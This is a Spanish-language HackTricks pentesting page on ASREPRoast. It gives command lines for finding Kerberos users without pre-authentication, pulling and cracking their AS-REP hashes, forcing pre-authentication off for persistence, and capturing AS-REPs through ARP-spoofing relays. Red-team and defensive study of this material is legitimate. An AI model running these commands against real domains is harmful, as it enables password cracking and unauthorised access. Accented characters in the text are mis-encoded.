HackTricksASREPRoast
tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 馃挰 Discord group or the telegram group or follow us on Twitter 馃惁 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
ASREPRoast
ASREPRoast es un ataque de seguridad que explota a los usuarios que carecen del atributo requerido de pre-autenticaci贸n de Kerberos. Esencialmente, esta vulnerabilidad permite a los atacantes solicitar autenticaci贸n para un usuario desde el Controlador de Dominio (DC) sin necesidad de la contrase帽a del usuario. El DC luego responde con un mensaje cifrado con la clave derivada de la contrase帽a del usuario, que los atacantes pueden intentar descifrar sin conexi贸n para descubrir la contrase帽a del usuario.
Los principales requisitos para este ataque son:
- Falta de pre-autenticaci贸n de Kerberos: Los usuarios objetivo no deben tener habilitada esta caracter铆stica de seguridad.
- Conexi贸n al Controlador de Dominio (DC): Los atacantes necesitan acceso al DC para enviar solicitudes y recibir mensajes cifrados.
- Cuenta de dominio opcional: Tener una cuenta de dominio permite a los atacantes identificar de manera m谩s eficiente a los usuarios vulnerables a trav茅s de consultas LDAP. Sin tal cuenta, los atacantes deben adivinar los nombres de usuario.
Enumerando usuarios vulnerables (necesita credenciales de dominio)
Get-DomainUser -PreauthNotRequired -verbose #List vuln users using PowerView
bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 get search --filter '(&(userAccountControl:1.2.840.113556.1.4.803:=4194304)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' --attr sAMAccountName
Solicitar mensaje AS_REP
#Try all the usernames in usernames.txt
python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
#Use domain creds to extract targets and target them
python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast
.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast [/user:username]
Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 (https://github.com/HarmJ0y/ASREPRoast)
warning
AS-REP Roasting con Rubeus generar谩 un 4768 con un tipo de cifrado de 0x17 y un tipo de preautenticaci贸n de 0.
Cracking
john --wordlist=passwords_kerb.txt hashes.asreproast
hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt
Persistencia
Forzar preauth no requerido para un usuario donde tienes permisos GenericAll (o permisos para escribir propiedades):
Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose
bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 add uac -f DONT_REQ_PREAUTH
ASREProast sin credenciales
Un atacante puede usar una posici贸n de hombre en el medio para capturar paquetes AS-REP mientras atraviesan la red sin depender de que la pre-autenticaci贸n de Kerberos est茅 deshabilitada. Por lo tanto, funciona para todos los usuarios en la VLAN.
ASRepCatcher nos permite hacerlo. Adem谩s, la herramienta obliga a las estaciones de trabajo de los clientes a usar RC4 al alterar la negociaci贸n de Kerberos.
# Actively acting as a proxy between the clients and the DC, forcing RC4 downgrade if supported
ASRepCatcher relay -dc $DC_IP
# Disabling ARP spoofing, the mitm position must be obtained differently
ASRepCatcher relay -dc $DC_IP --disable-spoofing
# Passive listening of AS-REP packets, no packet alteration
ASRepCatcher listen
Referencias
tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 馃挰 Discord group or the telegram group or follow us on Twitter 馃惁 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.